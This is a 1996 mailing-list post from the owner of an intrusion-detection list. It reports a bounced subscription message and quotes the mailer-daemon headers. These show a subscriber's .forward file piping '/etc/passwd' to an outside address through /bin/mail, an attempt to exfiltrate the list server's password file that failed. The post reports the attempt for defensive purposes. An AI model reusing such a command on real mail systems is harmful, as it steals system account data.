G'day, I dont know if this was a deliberate attempt to be amusing (definately to early for April Fools) but the owner-ids received an interesting Returned: mail from MAILER-DAEMON@pollux.cs.uga.edu. Could be a first 'Intrusion Detection List catches attempted intrusion' (hey Steve do you have an intrusion penetration rule for this scenario). The mail was in response to a subscription request to IDS (attempting to deliver the list introduction message). The Headers from MAILER-DAEMON: Date: Thu, 14 Mar 1996 21:20:34 -0500 (EST) From: Mail Delivery Subsystem <MAILER-DAEMON@pollux.cs.uga.edu> Subject: Returned mail: /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files To: <owner-ids@uow.edu.au> The original message was received at Thu, 14 Mar 1996 21:20:30 -0500 (EST) from wyrm.its.uow.edu.au [130.130.68.1] ----- The following addresses have delivery notifications ----- |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd (unrecoverable error) (expanded from: <lodwick@pollux.cs.uga.edu>) ----- Transcript of session follows ----- 553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... Unbalanced '<' 550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma iling to files -- +---------------------+--------------------------------------------------+ | ____ ___ | Justin Lister ruf@cs.uow.edu.au | | | \\ /\ __\ | Center for Computer Security Research | | | |) / \_/ / |_ | Dept. Computer Science voice: 61-42-214-327| | | _ \\ /| _/ | University of Wollongong fax: 61-42-214-329| | |_/ \/ \_/ |_| (tm) | LiNuX- iNTEL justification. mobile: 61-0411405217| | | Computer Security a utopian dream... | +---------------------+--------------------------------------------------+